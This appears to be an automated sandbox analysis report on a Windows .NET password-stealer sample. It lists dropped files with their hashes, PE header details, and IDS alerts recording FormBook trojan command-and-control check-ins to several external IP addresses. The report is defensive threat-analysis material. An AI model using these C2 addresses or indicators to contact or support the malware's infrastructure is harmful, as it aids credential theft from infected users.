                                            SHA-512:6BC86075632C3E56FFE1D371F4178299E93E014F5C5C83DFDCA2DC9EFD1155633409C79EC87CFE2AFD4374B83771AE56A3EB7FAC00F83921B433CB49216037F9
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>TV recorded in the last week</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{E5415A66-7763-4BDE-B97F-5557CA73C303}" name="TV shows in my library">.. <fragment name="Recording Date">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last week</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Recording Date</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1020
                                            Entropy (8bit):4.1337368900668165
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2bxOBZ5EkqfxI+/RWNVz3pnDCAAvXMV/NXq2SqCjQNCjqCjWBX2D:xtwxlYxDG/LJXAvcVNv/CGdKv
                                            MD5:A3787A42B81FCE0E448976AD158EDD93
                                            SHA1:45FF275C0C32EAB1F0B56E8B61E8EAD18CFD1675
                                            SHA-256:94BC17AC59BDE92FBCA00FCC69AED68FCBFE2C1754DD45F4810765F5FDF774FF
                                            SHA-512:B36CA10F580EC9D455FB57149BCE1897FE48FDA6023B2FB55B6B4B80A91F1754311B91EDD72C13103E0DA9ED90B696C28D6904EA91984ADE69ED50791F4065AE
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Video rated at 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{B2D9BDDC-8E49-444B-9BA4-193ABF9C7870}" name="Video in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Title</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>..
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1025
                                            Entropy (8bit):4.153394340103766
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwe3f4MUWZ35EkqfxI+/RWNVYAh1MsAvXj/zbCjqCH/zxqCjWBX2WN8M+:xtwx/hUTG/rdAvTCGDdKv
                                            MD5:467E71AA2FD951EB0A1AF3D6BB8378E8
                                            SHA1:FB654C0B2663D4FA5FD0F1658097D936DD0429ED
                                            SHA-256:A54BC2CAD63CED4FD9FF2A3A094A26E264E8A5CE8139193896D13236F494E2EE
                                            SHA-512:F9242A4925B910F4A114652967A6E2F49444A3F0D9F35402FEF28CC8D39C58720930084112BAF92EB6716AF541FD76E3803CCC1E742CEC07F1D4FB6ABC13A42C
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3075"/>.. <title>Music played the most</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Sort by">.. <argument name="value">Playcount: Total</argument>.. <argument name="condition">Descending</argument>.. </fragment>.. <fragment name="Playcount: Total">.. <argument name="condition">Is Greater Than</argument>.. <argument name="value">5</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1063
                                            Entropy (8bit):4.198592374702475
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2dL55EkqfxI+/RWNVYAh1MsAvXj7SNCjqCjhRNCjqCjWBX2WN8M+:xtwxloYG/rdAvXICGgCGdKv
                                            MD5:51AEED11707741118E0706C1259DF22E
                                            SHA1:6434E915B018C6D15898FE0A4D006BBE3E1EDB60
                                            SHA-256:EC286113E5AD77AC34063589A137A6DC4B4CAB8845CD9C5386519983FA3B48F0
                                            SHA-512:A674487F9CABE1FB2809CD98958DCE696F7F066D3738BFB30317201ED804DF3C72F2D24D6F9C0832CF446C8A965E21F3EA50AADA1C69860A12340D6ECA88E942
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Music</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Title</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>..
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):585
                                            Entropy (8bit):4.586939224969076
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxweAxdL535EkqfxI+/RWNVAiWMAAvXjWBX2WN8M+Vv:xtwxYf9qG/4xAv+Kv
                                            MD5:74294EF495559ED32731F19096D70312
                                            SHA1:FDC6CC849270016D2A382D7D0DAABF44A4556CD9
                                            SHA-256:DB34D82F2CD23E6E55A64E12D2A0A9C27AC2DED156483238F22A336CA6825110
                                            SHA-512:B068D903B83945F146ABD4CF384DA99AF608643C62B647EA65DB33C3B0E0FACE4727A74BE3210A9C6469BBC403D1F5C59D92CBD57722737E992B0E4F5E66662A
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 10.0.0.3449"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Pictures</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1079
                                            Entropy (8bit):4.232889887576815
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2dLx5EkqfxI+/RWNVz3pnDCAAvXnefVDKrqCjH1LbCjqCjWBX2W0:xtwxlowG/LJXAvXedKeMCGdKv
                                            MD5:372D0BEEBEA5460409A6A1C53AC52A18
                                            SHA1:1B5A925E00F9A4CC3A18FEB8F74A2E39EF11EEB6
                                            SHA-256:5B8B62B35E5DD8A46CCCCAF3FC3743BE9E0965D24CBCD20DA2681065EEB37EF3
                                            SHA-512:EFB412E3A17F4EAB84FB9F99B9E420D18E23610A9A66BCD7298C3BA68FD24ABE0C1F2E58FAA411E059788D34F4CEDE45F9E25C6578D13FAEFB8EE79ACD50F2E0
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Video</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{B2D9BDDC-8E49-444B-9BA4-193ABF9C7870}" name="Video in my library">.. <fragment name="Secondary Media Type">.. <argument name="condition">Is Not</argument>.. <argument name="value">Video: TV show</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Recording Date</argument>.. <argument name="condition">Descending</argument>.. </fragment>.. </sourceFilter>.. </
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):498
                                            Entropy (8bit):5.103913616294899
                                            Encrypted:false
                                            SSDEEP:12:TMbhJpIO1mcROtW/yF0T8YA+it/0zsFE/TYEGs/4w:qhJ+CTRSnF1wlwFUY6
                                            MD5:90BE2701C8112BEBC6BD58A7DE19846E
                                            SHA1:A95BE407036982392E2E684FB9FF6602ECAD6F1E
                                            SHA-256:644FBCDC20086E16D57F31C5BAD98BE68D02B1C061938D2F5F91CBE88C871FBF
                                            SHA-512:D618B473B68B48D746C912AC5FC06C73B047BD35A44A6EFC7A859FE1162D68015CF69DA41A5DB504DCBC4928E360C095B32A3B7792FCC6A38072E1EBD12E7CBE
                                            Malicious:false
                                            Preview:<?xml version="1.0" standalone="yes"?>..<!DOCTYPE document [..<!ELEMENT document (node*)>.. <!ATTLIST document WMSNameSpaceVersion CDATA "2.0">....<!ELEMENT node (node*)>.. <!ATTLIST node name CDATA #REQUIRED>.. <!ATTLIST node opcode ( create | remove | setval | clearval | rename | movebefore ) #REQUIRED>.. <!ATTLIST node secure ( true | false ) #IMPLIED>.. <!ATTLIST node type ( string | boolean | int32 | binary | int64 ) #IMPLIED>.. <!ATTLIST node value CDATA #IMPLIED>..]>..
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):10191
                                            Entropy (8bit):4.792342140217129
                                            Encrypted:false
                                            SSDEEP:96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
                                            MD5:7050D5AE8ACFBE560FA11073FEF8185D
                                            SHA1:5BC38E77FF06785FE0AEC5A345C4CCD15752560E
                                            SHA-256:CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
                                            SHA-512:A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
                                            Malicious:false
                                            Preview:.<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):53
                                            Entropy (8bit):4.66869469064966
                                            Encrypted:false
                                            SSDEEP:3:sLRaE92JWyhHX9ovy4dduRun:sLzTyRXKvndI0
                                            MD5:A9B5DA9AEC61657B32393D96217165F0
                                            SHA1:80B5C577155ACD269B450D70F6B2CBED693EDF49
                                            SHA-256:9F4611369CF65B33D886489B2486FCA7B1E83E0DC998D35B15B3AA4C8478A28D
                                            SHA-512:0B73B232C03FFD5CE526A1EDE481A57C753D15D9EE39D4247ABFA52819B59FA676C63E30825DAF233E3139038C353DF84D652C4CE2CB71A706DDDBDFE0C70335
                                            Malicious:false
                                            Preview:<document WMSNameSpaceVersion="2.0">....</document>..
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1510207563435464
                                            Encrypted:false
                                            SSDEEP:3:NlllulRjFllp:NllU
                                            MD5:7B390667B7AD392C3A7ECD95310E0D68
                                            SHA1:F7ED92E360DACA5B2BB3152AFB8A26DD5A408706
                                            SHA-256:E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
                                            SHA-512:0131C5BD611E47AF843A354F9AD83CAE0AA4A64B0FB723BB485B9FBDBF409A98BB5248336BCDE84FF72E3EB44D2EC10C30133767CD0DE32C77757C0EE75DCCC2
                                            Malicious:false
                                            Preview:@...e.................................@. ............@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\sc.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.1239949490932863
                                            Encrypted:false
                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                            MD5:271D5F995996735B01672CF227C81C17
                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\unregmp2.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1301
                                            Entropy (8bit):5.109506535588655
                                            Encrypted:false
                                            SSDEEP:24:ttoMlRs2WeHx1hZFYwzYAx0VoMARs2WeHx1hZFXx0VY1YRs2WeHx1H9sI9kYIVYc:4MrVR16wvx0KMIVR1Zx0G1AVR1d+YIGc
                                            MD5:03050AD13AFAF3E0C64BEF47FAF9A5FA
                                            SHA1:7A519E489EE8C735784E1BA77F15AF6578D6B9DB
                                            SHA-256:16AD883E5ACAEC348F9CD7E435920E85A4DBE0832357E185C73F8DFD15004A8B
                                            SHA-512:519E2C7B313A62C675779DF1852400F61DA2467DE5DA4ECAFB35949B8A2EED1ED2BE4D11DC17DD3321587676121ED92815F7E6923DB9C030AD9A480B14E149A5
                                            Malicious:false
                                            Preview:..[*WMC Logging begun at 2023/10/05 - 07:17:58. Logging at level: '4'. OS is NT. OSVer is 10.0.19045.0.1889. System Lang is 2057. Prev version system is 12.0.19041.1266. Setup version 12.0.19041.1.]..Checking for Playlist Obfuscation...Playlist location not obfuscated. Doing Obfuscation now...Obfuscation for Playlist location succeeded...Current command line: '/FirstLogon'.....[*WMC Logging begun at 2023/10/05 - 07:17:59. Logging at level: '4'. OS is NT. OSVer is 10.0.19045.0.1889. System Lang is 2057. Prev version system is 12.0.19041.1266. Setup version 12.0.19041.1.]..Checking for Playlist Obfuscation...Playlist location already obfuscated...Current command line: '/FirstLogon'.....[*WMC Logging begun at 2024/07/03 - 12:52:29. Logging at level: '4'. OS is NT. OSVer is 10.0.19045.0.1889. System Lang is 2057. Prev version system is 12.0.19041.1266. Setup version 12.0.19041.1.]..ERROR: Caller attempted to run 32bit unregmp2 on 64bit Windows. Call being switched to correct unre
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary
                                            Category:dropped
                                            Size (bytes):1868
                                            Entropy (8bit):3.318391119132836
                                            Encrypted:false
                                            SSDEEP:24:u92/EndOEJLMyUwUyAJyMSHcGYEXGhyQ3+fe4IUeLXRhnm+:Q2cndO0YpwURJyR/YEeyQ3CIhn1
                                            MD5:625B3C470881CEE9F5AA662AC6B67DF1
                                            SHA1:FA9ECB2122AE5C9D56B6A296DFDC06E36BCCBD2E
                                            SHA-256:C27FDCE8D8E37374798CF1CB16C1FB740F97E0DFE9D53173C6F65242E5256F23
                                            SHA-512:80E0ABFEC62C098126E001648A714AD576258725EF24A3214C9B63985E0A348A0228B2F4B221F6E1C1CA018AA4781255211BFE4DEB26854788D40E85BAFBA32C
                                            Malicious:false
                                            Preview:...............................................FL..................F.@.. ......$0...W..fi......$0................................P.O. .:i.....+00.../C:\.....................1......Xz...PROGRA~2.........O.I.Xz.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....r.1.....(Um...WINDOW~4..Z......O"v.X......".....................K...W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r.....f.2.....(U.. .wmplayer.exe..J......(U...X..................x.........[h..w.m.p.l.a.y.e.r...e.x.e.......g...............-.......f............7k......C:\Program Files (x86)\Windows Media Player\wmplayer.exe..=./.p.r.e.f.e.t.c.h.:.1.1. ./.Q.u.e.r.y.:.3.;.3.;.6.;.P.l.a.y. .a.l.l. .m.u.s.i.c.;.2.9.5.1.8.;.-.1.;.;.;.;.0.;.;.;.;.2.;.;...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.w.m.p.l.o.c...d.l.l.........%SystemRoot%\SYSTEM32\wmploc.dll..................................................................................................................................
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.469355824539876
                                            Encrypted:false
                                            SSDEEP:6144:UzZfpi6ceLPx9skLmb0fTZWSP3aJG8nAgeiJRMMhA2zX4WABluuN1jDH5S:aZHtTZWOKnMM6bFpvj4
                                            MD5:A745BBECD0B770822EC76CDA982B72B2
                                            SHA1:3451ED80B0B596321888087262D7836D4088F05F
                                            SHA-256:1E4AFF0C37524676CF5ACC87A0B1A5C0F6548C24D3268EA1543E17F82D7E4DCC
                                            SHA-512:5F5629B4814903180D3E70F065D38762B9D4A629284838BF54225F154E765415488F756FD69B6A98008C92908421EDEC9FB614F02D59282777F3AFBC2CFDC940
                                            Malicious:false
                                            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..GQi...............................................................................................................................................................................................................................................................................................................................................a.Pe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.040839027931189
                                            TrID:
                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                            • Win64 Executable Console (202006/5) 47.64%
                                            • Win64 Executable (generic) (12005/4) 2.83%
                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                            • DOS Executable Generic (2002/1) 0.47%
                                            File name:SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
                                            File size:2'928'646 bytes
                                            MD5:0d866e84b1b42f3b924d671db5b3b40e
                                            SHA1:8890d49ef3267c6c6697c0e56b85ce118e0f7eef
                                            SHA256:74f7be7a0e6e10f0209d700876ab03eb9d37cdcab79c0def5d536eb8accbf49f
                                            SHA512:15ede3729834e4f39d770301f59cf5ff3778a801b03cd9b4bcfcabf2175440aa54d24e39028fbe4ff35f7954115790ade310318ec6e03dc97b0a14281fe2ad2a
                                            SSDEEP:12288:oR2wucz+/euGRF7y7MrSE6blzZ5JpdxqLHqgyUbeLXp6ZzwsRYj:ojzBuCKx7FZ5JpdxqLHqYZz/RYj
                                            TLSH:F2D5AF91BA078C97FC1212B1C8EAB9F001FD5D5B70F4610FEF657D1266B227E10A693A
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...RJ.f.........."...0.J.... ........... ....@...... ................................-...`................................
                                            Icon Hash:1c188bc89a2c567b
                                            Entrypoint:0x400000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows cui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66854A52 [Wed Jul 3 12:55:46 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:
                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al
                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x41e8a | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa1ae | 0x1c | .text
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text  0x2000           0x824a        0x8400    484a8a7d4a7734f4b979f98fa0e1c448  False     0.6228693181818182  data       6.412680721843412  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  0xc000           0x41e8a       0x42000   8e1b805faf0f64b3bfda47f00afb0c72  False     0.16034490411931818 data       4.272099652497228  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA      Size     Type                                                                                                       Language  Country        ZLIB Complexity
RT_ICON        0xc15c   0x41428  Device independent bitmap graphic, 253 x 512 x 32, image size 259072, resolution 3779 x 3779 px/m                                  0.15837772723191573
RT_GROUP_ICON  0x4d584  0x14     data                                                                                                                                1.2
RT_VERSION     0x4d598  0x384    data                                                                                                                                0.48
RT_VERSION     0x4d91c  0x384    data                                                                                                       English   United States  0.4777777777777778
RT_MANIFEST    0x4dca0  0x1ea    XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                                                   0.5489795918367347
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                 Protocol  SID      Message                                      Source Port  Dest Port  Source IP    Dest IP
07/03/24-18:41:52.311175  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59424        80         192.168.2.6  152.32.156.214
07/03/24-18:41:19.435884  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59417        80         192.168.2.6  81.88.57.70
07/03/24-18:42:13.805576  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59432        80         192.168.2.6  64.190.62.22
07/03/24-18:43:25.886197  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59451        80         192.168.2.6  47.239.13.172
07/03/24-18:43:37.573012  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59454        80         192.168.2.6  47.239.13.172
07/03/24-18:40:48.928266  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59407        80         192.168.2.6  81.88.48.71
07/03/24-18:42:55.058990  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59441        80         192.168.2.6  142.250.185.211
07/03/24-18:43:51.413894  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59458        80         192.168.2.6  46.235.40.27
07/03/24-18:41:32.918372  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59421        80         192.168.2.6  203.161.49.220
07/03/24-18:42:06.211099  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59429        80         192.168.2.6  64.190.62.22
07/03/24-18:42:27.326971  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59436        80         192.168.2.6  23.105.172.12
07/03/24-18:43:45.249021  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59457        80         192.168.2.6  47.239.13.172
07/03/24-18:42:08.749026  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59430        80         192.168.2.6  64.190.62.22
07/03/24-18:43:30.949272  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59453        80         192.168.2.6  47.239.13.172
07/03/24-18:42:41.373375  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59437        80         192.168.2.6  185.151.30.199
07/03/24-18:40:56.597601  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59410        80         192.168.2.6  81.88.48.71
07/03/24-18:42:19.719004  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59433        80         192.168.2.6  23.105.172.12
07/03/24-18:43:59.021042  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59461        80         192.168.2.6  46.235.40.27
07/03/24-18:41:37.979242  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59423        80         192.168.2.6  203.161.49.220
07/03/24-18:41:54.857034  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59426        80         192.168.2.6  152.32.156.214
07/03/24-18:42:57.593154  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59442        80         192.168.2.6  142.250.185.211
07/03/24-18:44:08.627000  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59462        80         192.168.2.6  89.31.143.90
07/03/24-18:41:30.383840  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59420        80         192.168.2.6  203.161.49.220
07/03/24-18:42:22.262975  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59434        80         192.168.2.6  23.105.172.12
07/03/24-18:41:06.087866  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59412        80         192.168.2.6  156.251.142.105
07/03/24-18:43:02.663109  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59445        80         192.168.2.6  142.250.185.211
07/03/24-18:43:11.697394  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59447        80         192.168.2.6  47.239.13.172
07/03/24-18:41:59.948522  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59428        80         192.168.2.6  152.32.156.214
07/03/24-18:42:49.010973  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59440        80         192.168.2.6  185.151.30.199
07/03/24-18:43:23.357004  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59450        80         192.168.2.6  47.239.13.172
07/03/24-18:41:24.528998  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59419        80         192.168.2.6  81.88.57.70
07/03/24-18:40:33.146485  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59401        80         192.168.2.6  89.31.143.90
07/03/24-18:42:43.900906  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59438        80         192.168.2.6  185.151.30.199
07/03/24-18:41:16.892814  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59416        80         192.168.2.6  81.88.57.70
